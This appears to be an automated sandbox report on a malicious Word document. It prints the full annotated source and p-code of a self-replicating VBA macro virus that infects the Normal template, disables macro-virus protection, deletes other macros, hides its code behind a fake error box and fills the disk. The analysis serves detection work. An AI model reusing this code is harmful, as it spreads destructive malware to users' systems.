MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The critical heuristic firing indicates that the VBA macro self-replicates and disables Word's macro-virus protection, which points to an intent to spread and to evade detection. The Document_Open macro firing further supports execution of the code as soon as the document is opened. The extracted source confirms this: Document_close copies the module's entire code between the active document and the Normal template through the VBE object model (CodeModule DeleteLines/AddFromString), sets Options.VirusProtection = False, erases its own module if any error occurs, and — from July onward in any year from 2000 — repeatedly saves the document as AA<n>AA.DOC under C:\Windows\ in a loop bounded at 999999991 iterations, a disk-filling payload; Document_Open deletes any module code that lacks the virus's marker string.
Heuristics 3
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
VBA macro-virus self-replication / AV tampering — critical — OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. Matched line in script:
Options.VirusProtection = False -
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Private Sub Document_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13935 bytes |
| SHA-256: 33808cee32755167bd551cc31c5e4f05bca724dd5c264e55d5ff9c1eb3e78e6a | | | |
Preview script — first 1,000 lines of the extracted script
' Module attributes written by olevba: this is Word's ThisDocument class module
' (VB_Name/VB_Base), which is why the Document_* event handlers below run
' automatically; VB_TemplateDerived = True suggests it was built from the Normal
' template — consistent with the replication target used in the code.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Document_close: the infection routine, fired when the document is closed.
' What the visible code does:
'   * copies the full text of this module between the active document and the
'     Normal template (NormalTemplate) via the VBE object model, using the
'     marker string "exi" to tell an infected module from a clean one;
'   * turns off Word's macro-virus protection (Options.VirusProtection);
'   * from July onward in any year >= 2000, saves the document over and over as
'     AA<n>AA.DOC under C:\Windows\ (disk-filling payload);
'   * on any run-time error jumps to Finm, which erases this document's module.
' The module has no Option Explicit, so several names (SaveDoc, Saveplan,
' plainfec, nume1, Nume2, il, i, sd) are implicit Variants.
Private Sub Document_close()
' Any run-time error (e.g. VBProject access denied) lands at Finm below.
On Error GoTo Finm
' Only act on .doc / .dot targets.
If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
' Infection marker: its presence in a module means "already infected".
Const exi = "la macro de colombia xxx"
' In VBA, "Dim a, b As T" types only b; DInfec, Docu, modulin and contemodu are
' Variants. planinfec, modulin, Ninfec and Copform are declared but never used.
Dim DInfec, planinfec As Boolean
Dim Docu, Plan As Object
Dim modulin, contemodu, Ninfec As String
Dim Nume As Integer
Dim Copform As Object
' First VBComponent of the active document and of the Normal template: the two
' code modules the virus moves between.
Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
' Record whether each file had unsaved changes (Saveplan is never read).
SaveDoc = ActiveDocument.Saved
Saveplan = NormalTemplate.Saved
' Search both modules for the marker. Note the declared name is "planinfec" but
' the code uses "plainfec", so the template flag is an undeclared Variant.
DInfec = Docu.CodeModule.Find(exi, 1, 1, 40000, 40000)
plainfec = Plan.CodeModule.Find(exi, 1, 1, 40000, 40000)
'Ninfec = "'" & " "
' AV tampering: disables Word's built-in macro-virus warning. This is the line
' matched by the OLE_VBA_MACRO_VIRUS_REPLICATION heuristic.
Options.VirusProtection = False
' Random digit 0-9; replication below runs when it is 7 or 3, or always while
' the template is still clean (Nume = Nume is a no-op).
Nume = Mid(Int(Rnd() * 10), 1, 1)
Nume = Nume
nume1 = 7
Nume2 = 3
If Nume = nume1 Or Nume = Nume2 Or plainfec = False Then
' Document infected, template clean: delete every line of the template module
' (CountOfLines is read once, so "DeleteLines 1" repeated empties it), then
' insert this module's entire source.
If DInfec = True And plainfec = False Then
On Error Resume Next
For il = 1 To Plan.CodeModule.CountOfLines
Plan.CodeModule.DeleteLines 1
Next
On Error GoTo Finm
'Docu.CodeModule.addfromstring Ninfec
contemodu = Docu.CodeModule.Lines(1, Docu.CodeModule.CountOfLines)
Plan.CodeModule.AddFromString contemodu
End If
' Template infected, document clean: the same copy in the other direction.
If DInfec = False And plainfec = True Then
On Error Resume Next
For il = 1 To Docu.CodeModule.CountOfLines
Docu.CodeModule.DeleteLines 1
Next
On Error GoTo Finm
'Plan.CodeModule.addfromstring Ninfec
contemodu = Plan.CodeModule.Lines(1, Plan.CodeModule.CountOfLines)
Docu.CodeModule.AddFromString contemodu
End If
' Persist: the document is saved only if it reported no unsaved changes before;
' the template is saved only when it was clean (i.e. just infected).
If SaveDoc = True Then ThisDocument.Save
If SaveDoc = True And plainfec = False Then NormalTemplate.Save
End If
End If
' Date string built but never used.
sd = Day(Now()) & "-" & Month(Now()) & "-" & Year(Now())
sd = Trim(sd)
' Payload trigger: July to December of any year from 2000 on.
If Year(Now()) >= 2000 And Month(Now()) > 6 Then
ChangeFileOpenDirectory "C:\Windows\"
' Saves the document as AA1AA.DOC, AA2AA.DOC, ... for up to 999999991
' iterations; the first failing SaveAs (e.g. disk full, access denied) raises
' an error and control passes to Finm.
For i = 1 To 999999991
ActiveDocument.SaveAs FileName:=("AA" & i & "AA.DOC"), FileFormat:= _
wdFormatDocument, LockComments:=False, Password:="", AddToRecentFiles:= _
True, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:= _
False, SaveNativePictureFormat:=False, SaveFormsData:=False, _
SaveAsAOCELetter:=False
Next
End If
GoTo Finb
' Error handler: erase this document's own module, leaving no code to inspect.
Finm:
On Error Resume Next
For il = 1 To Docu.CodeModule.CountOfLines
Docu.CodeModule.DeleteLines 1
Next
GoTo Finb
' Common exit.
Finb:
On Error Resume Next
End Sub
' Document_New: empty stub; nothing happens when a new document is created.
Private Sub Document_New()
End Sub
' Document_Open: runs when the document is opened (OLE_VBA_DOCOPEN heuristic).
' It does not replicate. For the active document's first module and for the
' Normal template's first module it checks for the virus marker; if the module
' has code but no marker, every line is deleted, i.e. any macro code that is
' not the virus's own is removed. All errors are silently ignored, so if
' VBProject access is denied the routine simply does nothing.
Private Sub Document_Open()
On Error Resume Next
' Same infection marker as in Document_close.
Const exi = "la macro de colombia xxx"
' "Dim a, b As Object" types only Plan; Docu is a Variant. DInfec, plainfec
' and il are undeclared (no Option Explicit).
Dim Docu, Plan As Object
Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
If Docu.CodeModule.CountOfLines > 0 Then
DInfec = Docu.CodeModule.Find(exi, 1, 1, 40000, 40000)
' Marker absent: wipe the document module.
If DInfec = False Then
For il = 1 To Docu.CodeModule.CountOfLines
Docu.CodeModule.DeleteLines 1
Next
End If
End If
Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
If Plan.CodeModule.CountOfLines > 0 Then
plainfec = Plan.CodeModule.Find(exi, 1, 1, 40000, 40000)
' Marker absent: wipe the Normal template module.
If plainfec = False Then
For il = 1 To Plan.CodeModule.CountOfLines
Plan.CodeModule.DeleteLines 1
Next
End If
End If
End Sub
' Decoy routine: shows a fake "Visual Basic environment could not be
' initialized" error box. Presumably meant to stand in for Word's View Code
' action so a user does not reach the macro source — confirm against the
' document's menu/toolbar customizations. The trailing comment is the string
' "Private Sub document_open()" written backwards.
Private Sub viewvbcode(): MsgBox "The Visual Basic environment could not be initialized. Please run setup to install it correctly.", vbCritical: End Sub ' )(nepo_tnemucod buS etavirP
' Processing file: /opt/analyzer/scan_staging/71ce6a4c3e4242678599c9d4ce403750.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7205 bytes
' Line #0:
' FuncDefn (Private Sub Document_close())
' Line #1:
' Line #2:
' OnError Finm
' Line #3:
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatDocument
' Eq
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatTemplate
' Eq
' Or
' IfBlock
' Line #4:
' Dim (Const)
' LitStr 0x0018 "la macro de colombia xxx"
' VarDefn exi
' Line #5:
' Dim
' VarDefn DInfec
' VarDefn planinfec (As Boolean)
' Line #6:
' Dim
' VarDefn Docu
' VarDefn Plan (As Object)
' Line #7:
' Dim
' VarDefn modulin
' VarDefn contemodu
' VarDefn Ninfec (As String)
' Line #8:
' Dim
' VarDefn Nume (As Integer)
' Line #9:
' Dim
' VarDefn Copform (As Object)
' Line #10:
' Line #11:
' Line #12:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Docu
' Line #13:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Plan
' Line #14:
' Line #15:
' Ld ActiveDocument
' MemLd Saved
' St SaveDoc
' Line #16:
' Ld NormalTemplate
' MemLd Saved
' St Saveplan
' Line #17:
' Line #18:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Docu
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St DInfec
' Line #19:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Plan
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St plainfec
' Line #20:
' Line #21:
' QuoteRem 0x0006 0x0012 "Ninfec = "'" & " ""
' Line #22:
' Line #23:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #24:
' Line #25:
' ArgsLd Rnd 0x0000
' LitDI2 0x000A
' Mul
' FnInt
' LitDI2 0x0001
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' St Nume
' Line #26:
' Ld Nume
' St Nume
' Line #27:
' LitDI2 0x0007
' St nume1
' Line #28:
' LitDI2 0x0003
' St Nume2
' Line #29:
' Ld Nume
' Ld nume1
' Eq
' Ld Nume
' Ld Nume2
' Eq
' Or
' Ld plainfec
' LitVarSpecial (False)
' Eq
' Or
' IfBlock
' Line #30:
' Ld DInfec
' LitVarSpecial (True)
' Eq
' Ld plainfec
' LitVarSpecial (False)
' Eq
' And
' IfBlock
' Line #31:
' OnError (Resume Next)
' Line #32:
' StartForVariable
' Ld il
' EndForVariable
' LitDI2 0x0001
' Ld Plan
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #33:
' LitDI2 0x0001
' Ld Plan
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #34:
' StartForVariable
' Next
' Line #35:
' OnError Finm
' Line #36:
' QuoteRem 0x000C 0x0024 "Docu.CodeModule.addfromstring Ninfec"
' Line #37:
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' MemLd CountOfLines
' Ld Docu
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St contemodu
' Line #38:
' Ld contemodu
' Ld Plan
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #39:
' EndIfBlock
' Line #40:
' Line #41:
' Ld DInfec
' LitVarSpecial (False)
' Eq
' Ld plainfec
' LitVarSpecial (True)
' Eq
' And
' IfBlock
' Line #42:
' OnError (Resume Next)
' Line #43:
' StartForVariable
' Ld il
' EndForVariable
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #44:
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #45:
' StartForVariable
' Next
' Line #46:
' OnError Finm
' Line #47:
' QuoteRem 0x000B 0x0024 "Plan.CodeModule.addfromstring Ninfec"
' Line #48:
' LitDI2 0x0001
' Ld Plan
' MemLd CodeModule
' MemLd CountOfLines
' Ld Plan
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St contemodu
' Line #49:
' Ld contemodu
' Ld Docu
' MemLd CodeModule
' ArgsMemCall AddFromString 0x0001
' Line #50:
' EndIfBlock
' Line #51:
' Line #52:
' Ld SaveDoc
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' Ld ThisDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #53:
' Ld SaveDoc
' LitVarSpecial (True)
' Eq
' Ld plainfec
' LitVarSpecial (False)
' Eq
' And
' If
' BoSImplicit
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' EndIf
' Line #54:
' EndIfBlock
' Line #55:
' EndIfBlock
' Line #56:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitStr 0x0001 "-"
' Concat
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' Concat
' LitStr 0x0001 "-"
' Concat
' ArgsLd Now 0x0000
' ArgsLd Year 0x0001
' Concat
' St sd
' Line #57:
' Ld sd
' ArgsLd Trim 0x0001
' St sd
' Line #58:
' ArgsLd Now 0x0000
' ArgsLd Year 0x0001
' LitDI2 0x07D0
' Ge
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x0006
' Gt
' And
' IfBlock
' Line #59:
' LitStr 0x000B "C:\Windows\"
' ArgsCall ChangeFileOpenDirectory 0x0001
' Line #60:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI4 0xC9F7 0x3B9A
' For
' Line #61:
' LineCont 0x0010 0F 00 08 00 1B 00 08 00 27 00 08 00 31 00 08 00
' LitStr 0x0002 "AA"
' Ld i
' Concat
' LitStr 0x0006 "AA.DOC"
' Concat
' Paren
' ParamNamed FileName
' Ld wdFormatDocument
' ParamNamed FileFormat
' LitVarSpecial (False)
' ParamNamed LockComments
' LitStr 0x0000 ""
' ParamNamed Password
' LitVarSpecial (True)
' ParamNamed AddToRecentFiles
' LitStr 0x0000 ""
' ParamNamed WritePassword
' LitVarSpecial (False)
' ParamNamed ReadOnlyRecommended
' LitVarSpecial (False)
' ParamNamed EmbedTrueTypeFonts
' LitVarSpecial (False)
' ParamNamed SaveNativePictureFormat
' LitVarSpecial (False)
' ParamNamed SaveFormsData
' LitVarSpecial (False)
' ParamNamed SaveAsAOCELetter
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x000B
' Line #62:
' StartForVariable
' Next
' Line #63:
' EndIfBlock
' Line #64:
' GoTo Finb
' Line #65:
' Line #66:
' Label Finm
' Line #67:
' OnError (Resume Next)
' Line #68:
' StartForVariable
' Ld il
' EndForVariable
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #69:
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #70:
' StartForVariable
' Next
' Line #71:
' GoTo Finb
' Line #72:
' Label Finb
' Line #73:
' OnError (Resume Next)
' Line #74:
' EndSub
' Line #75:
' Line #76:
' FuncDefn (Private Sub Document_New())
' Line #77:
' Line #78:
' EndSub
' Line #79:
' Line #80:
' FuncDefn (Private Sub Document_Open())
' Line #81:
' OnError (Resume Next)
' Line #82:
' Dim (Const)
' LitStr 0x0018 "la macro de colombia xxx"
' VarDefn exi
' Line #83:
' Dim
' VarDefn Docu
' VarDefn Plan (As Object)
' Line #84:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Docu
' Line #85:
' Ld Docu
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0000
' Gt
' IfBlock
' Line #86:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Docu
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St DInfec
' Line #87:
' Ld DInfec
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #88:
' StartForVariable
' Ld il
' EndForVariable
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #89:
' LitDI2 0x0001
' Ld Docu
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #90:
' StartForVariable
' Next
' Line #91:
' EndIfBlock
' Line #92:
' EndIfBlock
' Line #93:
' Line #94:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set Plan
' Line #95:
' Ld Plan
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0000
' Gt
' IfBlock
' Line #96:
' Ld exi
' LitDI2 0x0001
' LitDI2 0x0001
' LitDI4 0x9C40 0x0000
' LitDI4 0x9C40 0x0000
' Ld Plan
' MemLd CodeModule
' ArgsMemLd Find 0x0005
' St plainfec
' Line #97:
' Ld plainfec
' LitVarSpecial (False)
' Eq
' IfBlock
' Line #98:
' StartForVariable
' Ld il
' EndForVariable
' LitDI2 0x0001
' Ld Plan
' MemLd CodeModule
' MemLd CountOfLines
' For
' Line #99:
' LitDI2 0x0001
' Ld Plan
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0001
' Line #100:
' StartForVariable
' Next
' Line #101:
' EndIfBlock
' Line #102:
' EndIfBlock
' Line #103:
' EndSub
' Line #104:
' FuncDefn (Private Sub viewvbcode())
' BoS 0x0000
' LitStr 0x0060 "The Visual Basic environment could not be initialized. Please run setup to install it correctly."
' Ld vbCritical
' ArgsCall MsgBox 0x0002
' BoS 0x0000
' EndSub
' QuoteRem 0x0099 0x001C " )(nepo_tnemucod buS etavirP"
' Line #105:
' Line #106:
' Line #107:
' Line #108:
' Line #109:
' Line #110:
' Line #111:
' Line #112:
' Line #113:
' Line #114:
' Line #115:
' Line #116:
' Line #117:
' Line #118:
' Line #119:
' Line #120:
' Line #121:
' Line #122:
' Line #123:
' Line #124:
' Line #125:
' Line #126:
' Line #127:
' Line #128:
' Line #129:
' Line #130:
' Line #131:
' Line #132:
' Line #133:
' Line #134:
' Line #135:
' Line #136:
' Line #137:
' Line #138:
' Line #139:
' Line #140:
' Line #141:
' Line #142:
' Line #143:
' Line #144:
' Line #145:
' Line #146:
' Line #147:
' Line #148:
' Line #149:
' Line #150:
' Line #151:
' Line #152:
' Line #153:
' Line #154:
' Line #155:
' Line #156:
' Line #157:
' Line #158:
' Line #159:
' Line #160:
' Line #161:
' Line #162:
' Line #163:
' Line #164:
' Line #165:
' Line #166:
' Line #167:
' Line #168:
' Line #169:
' Line #170:
' Line #171:
' Line #172:
' Line #173:
' Line #174: